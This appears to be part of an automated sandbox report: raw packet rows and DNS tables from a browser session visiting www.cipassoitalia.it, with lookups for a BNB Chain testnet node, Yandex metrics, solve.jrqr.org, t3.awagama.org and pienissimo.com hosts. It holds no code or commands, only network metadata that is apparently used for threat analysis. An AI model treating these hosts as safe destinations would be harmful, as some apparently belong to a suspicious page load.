                                                                                                                                              Jan 3, 2025 17:33:04.496028900 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.508630037 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.508646011 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.508708954 CET49822443192.168.2.1677.88.21.119
                                                                                                                                              Jan 3, 2025 17:33:04.508722067 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.518026114 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.518034935 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.518091917 CET49822443192.168.2.1677.88.21.119
                                                                                                                                              Jan 3, 2025 17:33:04.518100977 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.518583059 CET4434982489.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.518604040 CET4434982489.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.518641949 CET4434982489.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.518650055 CET49824443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:04.518671036 CET4434982489.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.518704891 CET49824443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:04.519233942 CET49824443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:04.519269943 CET4434982489.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.519331932 CET49824443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:04.522248030 CET49836443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:04.522280931 CET4434983689.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.522344112 CET49836443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:04.522929907 CET49836443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:04.522942066 CET4434983689.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.524302959 CET49837443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:04.524344921 CET4434983789.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.524406910 CET49837443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:04.524604082 CET49837443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:04.524615049 CET4434983789.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.531049013 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.531054974 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.531153917 CET49822443192.168.2.1677.88.21.119
                                                                                                                                              Jan 3, 2025 17:33:04.531162977 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.540903091 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.540915012 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.540983915 CET49822443192.168.2.1677.88.21.119
                                                                                                                                              Jan 3, 2025 17:33:04.540991068 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.551191092 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.551198006 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.551261902 CET49822443192.168.2.1677.88.21.119
                                                                                                                                              Jan 3, 2025 17:33:04.551268101 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.560306072 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.560313940 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.560483932 CET49822443192.168.2.1677.88.21.119
                                                                                                                                              Jan 3, 2025 17:33:04.560489893 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.569143057 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.569150925 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.569231987 CET49822443192.168.2.1677.88.21.119
                                                                                                                                              Jan 3, 2025 17:33:04.569241047 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.580620050 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.580629110 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.580708027 CET49822443192.168.2.1677.88.21.119
                                                                                                                                              Jan 3, 2025 17:33:04.580719948 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.588953018 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.588960886 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.589044094 CET49822443192.168.2.1677.88.21.119
                                                                                                                                              Jan 3, 2025 17:33:04.589051008 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.599618912 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.599627972 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.599724054 CET49822443192.168.2.1677.88.21.119
                                                                                                                                              Jan 3, 2025 17:33:04.599735022 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.607356071 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.607362986 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.607431889 CET49822443192.168.2.1677.88.21.119
                                                                                                                                              Jan 3, 2025 17:33:04.607439041 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.614995956 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.615004063 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.615096092 CET49822443192.168.2.1677.88.21.119
                                                                                                                                              Jan 3, 2025 17:33:04.615103006 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.623459101 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.623466969 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.623555899 CET49822443192.168.2.1677.88.21.119
                                                                                                                                              Jan 3, 2025 17:33:04.623564005 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.629817009 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.629825115 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.629884958 CET49822443192.168.2.1677.88.21.119
                                                                                                                                              Jan 3, 2025 17:33:04.629890919 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.636589050 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.636647940 CET49822443192.168.2.1677.88.21.119
                                                                                                                                              Jan 3, 2025 17:33:04.636811972 CET49822443192.168.2.1677.88.21.119
                                                                                                                                              Jan 3, 2025 17:33:04.636827946 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:04.640206099 CET4434982589.46.108.67192.168.2.16
                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                              Jan 3, 2025 17:32:45.184803009 CET192.168.2.161.1.1.10x79b0Standard query (0)www.cipassoitalia.itA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:32:45.184963942 CET192.168.2.161.1.1.10xf5b5Standard query (0)www.cipassoitalia.it65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:32:45.949620008 CET192.168.2.161.1.1.10x5b7cStandard query (0)www.cipassoitalia.itA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:32:45.949763060 CET192.168.2.161.1.1.10x55c4Standard query (0)www.cipassoitalia.it65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:32:47.265153885 CET192.168.2.161.1.1.10x8b2eStandard query (0)s.w.orgA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:32:47.265547991 CET192.168.2.161.1.1.10x2e12Standard query (0)s.w.org65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:32:49.068708897 CET192.168.2.161.1.1.10xd39eStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:32:49.068871021 CET192.168.2.161.1.1.10x2688Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:00.017438889 CET192.168.2.161.1.1.10x66efStandard query (0)www.cipassoitalia.itA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:00.017584085 CET192.168.2.161.1.1.10x3910Standard query (0)www.cipassoitalia.it65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:00.690936089 CET192.168.2.161.1.1.10x1945Standard query (0)data-seed-prebsc-1-s1.bnbchain.orgA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:00.691127062 CET192.168.2.161.1.1.10xb0a4Standard query (0)_8545._https.data-seed-prebsc-1-s1.bnbchain.org65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:01.592170954 CET192.168.2.161.1.1.10x3d87Standard query (0)data-seed-prebsc-1-s1.bnbchain.orgA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:01.592170954 CET192.168.2.161.1.1.10x597Standard query (0)_8545._https.data-seed-prebsc-1-s1.bnbchain.org65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:01.602410078 CET192.168.2.161.1.1.10x3172Standard query (0)use.fontawesome.comA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:01.602545023 CET192.168.2.161.1.1.10x6033Standard query (0)use.fontawesome.com65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:02.927696943 CET192.168.2.161.1.1.10x7d0Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:02.927830935 CET192.168.2.161.1.1.10xb08eStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:02.928062916 CET192.168.2.161.1.1.10xc09cStandard query (0)mc.yandex.ruA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:02.928178072 CET192.168.2.161.1.1.10xade8Standard query (0)mc.yandex.ru65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:03.989362001 CET192.168.2.161.1.1.10x93c4Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:03.989504099 CET192.168.2.161.1.1.10xc510Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:04.639811039 CET192.168.2.161.1.1.10x3809Standard query (0)mc.yandex.ruA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:04.639940023 CET192.168.2.161.1.1.10x936bStandard query (0)mc.yandex.ru65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:04.884274960 CET192.168.2.161.1.1.10x555aStandard query (0)mc.yandex.comA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:04.884454966 CET192.168.2.161.1.1.10x7a04Standard query (0)mc.yandex.com65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:05.873040915 CET192.168.2.161.1.1.10x103cStandard query (0)mc.yandex.comA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:05.873178005 CET192.168.2.161.1.1.10x52c6Standard query (0)mc.yandex.com65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:07.259753942 CET192.168.2.161.1.1.10x4b51Standard query (0)mc.yandex.comA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:07.259896994 CET192.168.2.161.1.1.10xbe1Standard query (0)mc.yandex.com65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:11.003885984 CET192.168.2.161.1.1.10xe7feStandard query (0)s.w.orgA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:11.004034042 CET192.168.2.161.1.1.10x7a93Standard query (0)s.w.org65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:18.584875107 CET192.168.2.161.1.1.10x858dStandard query (0)solve.jrqr.orgA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:22.697582960 CET192.168.2.161.1.1.10xcc04Standard query (0)t3.awagama.orgA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:58.320909023 CET192.168.2.161.1.1.10xc735Standard query (0)t3.awagama.orgA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:58.321058989 CET192.168.2.161.1.1.10xb920Standard query (0)t3.awagama.org65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:59.147902966 CET192.168.2.161.1.1.10x30b6Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:59.148078918 CET192.168.2.161.1.1.10x7975Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:59.526689053 CET192.168.2.161.1.1.10x46e8Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:59.526829958 CET192.168.2.161.1.1.10x9accStandard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:02.664783001 CET192.168.2.161.1.1.10x15ceStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:02.664783001 CET192.168.2.161.1.1.10xf36eStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:02.665127993 CET192.168.2.161.1.1.10x5b53Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:02.665436983 CET192.168.2.161.1.1.10x55c5Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:02.673141003 CET192.168.2.161.1.1.10xf146Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:02.673141003 CET192.168.2.161.1.1.10xa299Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:06.620677948 CET192.168.2.161.1.1.10xb1d8Standard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:06.620842934 CET192.168.2.161.1.1.10x656fStandard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:06.663463116 CET192.168.2.161.1.1.10xecb8Standard query (0)t3.awagama.orgA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:06.663597107 CET192.168.2.161.1.1.10x3c2eStandard query (0)t3.awagama.org65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:07.616779089 CET192.168.2.161.1.1.10xe411Standard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:07.616857052 CET192.168.2.161.1.1.10x94fbStandard query (0)play.google.com65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:10.367306948 CET192.168.2.161.1.1.10x7bc4Standard query (0)forms.pienissimo.comA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:10.367475986 CET192.168.2.161.1.1.10x4c94Standard query (0)forms.pienissimo.com65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:11.344177008 CET192.168.2.161.1.1.10x89f9Standard query (0)unpkg.comA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:11.344254971 CET192.168.2.161.1.1.10x34b6Standard query (0)unpkg.com65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:12.252125025 CET192.168.2.161.1.1.10x7214Standard query (0)forms.pienissimo.comA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:12.252268076 CET192.168.2.161.1.1.10x7626Standard query (0)forms.pienissimo.com65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:12.734859943 CET192.168.2.161.1.1.10xc88aStandard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:12.734983921 CET192.168.2.161.1.1.10xf887Standard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:14.056747913 CET192.168.2.161.1.1.10xb782Standard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:14.056920052 CET192.168.2.161.1.1.10x1543Standard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:15.321146965 CET192.168.2.161.1.1.10x477dStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:15.321278095 CET192.168.2.161.1.1.10x35f0Standard query (0)api.ipify.org65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:15.381438971 CET192.168.2.161.1.1.10x2ac7Standard query (0)enginev2.pienissimo.comA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:15.381577015 CET192.168.2.161.1.1.10x352aStandard query (0)enginev2.pienissimo.com65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:16.000076056 CET192.168.2.161.1.1.10xaf6bStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:16.000219107 CET192.168.2.161.1.1.10xb99aStandard query (0)api.ipify.org65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:16.444199085 CET192.168.2.161.1.1.10x5a1fStandard query (0)enginev2.pienissimo.comA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:16.444411993 CET192.168.2.161.1.1.10x510aStandard query (0)enginev2.pienissimo.com65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:18.769074917 CET192.168.2.161.1.1.10x11d9Standard query (0)pienissimo.s3.eu-central-1.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:18.769213915 CET192.168.2.161.1.1.10x83cdStandard query (0)pienissimo.s3.eu-central-1.amazonaws.com65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:19.915391922 CET192.168.2.161.1.1.10x4795Standard query (0)pienissimo.s3.eu-central-1.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:19.915683031 CET192.168.2.161.1.1.10x9704Standard query (0)pienissimo.s3.eu-central-1.amazonaws.com65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:44.240864038 CET192.168.2.161.1.1.10xd0c2Standard query (0)www.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:44.855230093 CET192.168.2.161.1.1.10xe641Standard query (0)static.cloudflareinsights.comA (IP address)IN (0x0001)false
                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                              Jan 3, 2025 17:32:45.270870924 CET1.1.1.1192.168.2.160x79b0No error (0)www.cipassoitalia.it89.46.108.67A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:32:46.022891998 CET1.1.1.1192.168.2.160x5b7cNo error (0)www.cipassoitalia.it89.46.108.67A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:32:47.272264957 CET1.1.1.1192.168.2.160x8b2eNo error (0)s.w.org192.0.77.48A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:32:49.079160929 CET1.1.1.1192.168.2.160xd39eNo error (0)www.google.com142.250.185.132A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:32:49.079366922 CET1.1.1.1192.168.2.160x2688No error (0)www.google.com65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:00.090920925 CET1.1.1.1192.168.2.160x66efNo error (0)www.cipassoitalia.it89.46.108.67A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:00.721700907 CET1.1.1.1192.168.2.160x1945No error (0)data-seed-prebsc-1-s1.bnbchain.orga37dd8b3f3000a75e.awsglobalaccelerator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:00.721700907 CET1.1.1.1192.168.2.160x1945No error (0)a37dd8b3f3000a75e.awsglobalaccelerator.com15.197.152.159A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:00.721700907 CET1.1.1.1192.168.2.160x1945No error (0)a37dd8b3f3000a75e.awsglobalaccelerator.com3.33.155.121A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:00.729882002 CET1.1.1.1192.168.2.160xb0a4Name error (3)_8545._https.data-seed-prebsc-1-s1.bnbchain.orgnonenone65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:01.609335899 CET1.1.1.1192.168.2.160x3172No error (0)use.fontawesome.comuse.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:01.609392881 CET1.1.1.1192.168.2.160x6033No error (0)use.fontawesome.comuse.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:01.623518944 CET1.1.1.1192.168.2.160x3d87No error (0)data-seed-prebsc-1-s1.bnbchain.orga37dd8b3f3000a75e.awsglobalaccelerator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:01.623518944 CET1.1.1.1192.168.2.160x3d87No error (0)a37dd8b3f3000a75e.awsglobalaccelerator.com3.33.155.121A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:01.623518944 CET1.1.1.1192.168.2.160x3d87No error (0)a37dd8b3f3000a75e.awsglobalaccelerator.com15.197.152.159A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:01.627775908 CET1.1.1.1192.168.2.160x597Name error (3)_8545._https.data-seed-prebsc-1-s1.bnbchain.orgnonenone65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:02.934515953 CET1.1.1.1192.168.2.160x7d0No error (0)www.google.com142.250.185.164A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:02.934535027 CET1.1.1.1192.168.2.160xb08eNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:02.934765100 CET1.1.1.1192.168.2.160xc09cNo error (0)mc.yandex.ru77.88.21.119A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:02.934765100 CET1.1.1.1192.168.2.160xc09cNo error (0)mc.yandex.ru93.158.134.119A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:02.934765100 CET1.1.1.1192.168.2.160xc09cNo error (0)mc.yandex.ru87.250.250.119A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:02.934765100 CET1.1.1.1192.168.2.160xc09cNo error (0)mc.yandex.ru87.250.251.119A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:03.996577024 CET1.1.1.1192.168.2.160xc510No error (0)www.google.com65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:03.997132063 CET1.1.1.1192.168.2.160x93c4No error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:04.646363020 CET1.1.1.1192.168.2.160x3809No error (0)mc.yandex.ru87.250.251.119A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:04.646363020 CET1.1.1.1192.168.2.160x3809No error (0)mc.yandex.ru77.88.21.119A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:04.646363020 CET1.1.1.1192.168.2.160x3809No error (0)mc.yandex.ru93.158.134.119A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:04.646363020 CET1.1.1.1192.168.2.160x3809No error (0)mc.yandex.ru87.250.250.119A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:04.890933037 CET1.1.1.1192.168.2.160x555aNo error (0)mc.yandex.commc.yandex.ruCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:04.890933037 CET1.1.1.1192.168.2.160x555aNo error (0)mc.yandex.ru87.250.251.119A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:04.890933037 CET1.1.1.1192.168.2.160x555aNo error (0)mc.yandex.ru93.158.134.119A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:04.890933037 CET1.1.1.1192.168.2.160x555aNo error (0)mc.yandex.ru87.250.250.119A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:04.890933037 CET1.1.1.1192.168.2.160x555aNo error (0)mc.yandex.ru77.88.21.119A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:04.891475916 CET1.1.1.1192.168.2.160x7a04No error (0)mc.yandex.commc.yandex.ruCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:05.879734039 CET1.1.1.1192.168.2.160x103cNo error (0)mc.yandex.commc.yandex.ruCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:05.879734039 CET1.1.1.1192.168.2.160x103cNo error (0)mc.yandex.ru87.250.251.119A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:05.879734039 CET1.1.1.1192.168.2.160x103cNo error (0)mc.yandex.ru93.158.134.119A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:05.879734039 CET1.1.1.1192.168.2.160x103cNo error (0)mc.yandex.ru87.250.250.119A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:05.879734039 CET1.1.1.1192.168.2.160x103cNo error (0)mc.yandex.ru77.88.21.119A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:05.880026102 CET1.1.1.1192.168.2.160x52c6No error (0)mc.yandex.commc.yandex.ruCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:07.266659021 CET1.1.1.1192.168.2.160x4b51No error (0)mc.yandex.commc.yandex.ruCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:07.266659021 CET1.1.1.1192.168.2.160x4b51No error (0)mc.yandex.ru77.88.21.119A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:07.266659021 CET1.1.1.1192.168.2.160x4b51No error (0)mc.yandex.ru93.158.134.119A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:07.266659021 CET1.1.1.1192.168.2.160x4b51No error (0)mc.yandex.ru87.250.250.119A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:07.266659021 CET1.1.1.1192.168.2.160x4b51No error (0)mc.yandex.ru87.250.251.119A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:07.266746998 CET1.1.1.1192.168.2.160xbe1No error (0)mc.yandex.commc.yandex.ruCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:11.010854959 CET1.1.1.1192.168.2.160xe7feNo error (0)s.w.org192.0.77.48A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:18.713895082 CET1.1.1.1192.168.2.160x858dNo error (0)solve.jrqr.org104.21.27.98A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:18.713895082 CET1.1.1.1192.168.2.160x858dNo error (0)solve.jrqr.org172.67.169.28A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:22.711105108 CET1.1.1.1192.168.2.160xcc04No error (0)t3.awagama.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:22.711105108 CET1.1.1.1192.168.2.160xcc04No error (0)t3.awagama.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:58.261076927 CET1.1.1.1192.168.2.160xb466No error (0)svc.ha-teams.office.commira-tmc.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:58.261076927 CET1.1.1.1192.168.2.160xb466No error (0)mira-tmc.tm-4.office.com52.123.243.76A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:58.261076927 CET1.1.1.1192.168.2.160xb466No error (0)mira-tmc.tm-4.office.com52.123.243.210A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:58.261076927 CET1.1.1.1192.168.2.160xb466No error (0)mira-tmc.tm-4.office.com52.123.243.81A (IP address)IN (0x0001)false
